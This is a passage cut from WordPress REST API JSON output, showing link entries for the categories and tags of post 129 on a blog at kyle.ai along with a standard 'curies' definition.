-json\/wp\/v2\/categories?post=129"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kyle.ai\/blog\/wp-json\/wp\/v2\/tags?post=129"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}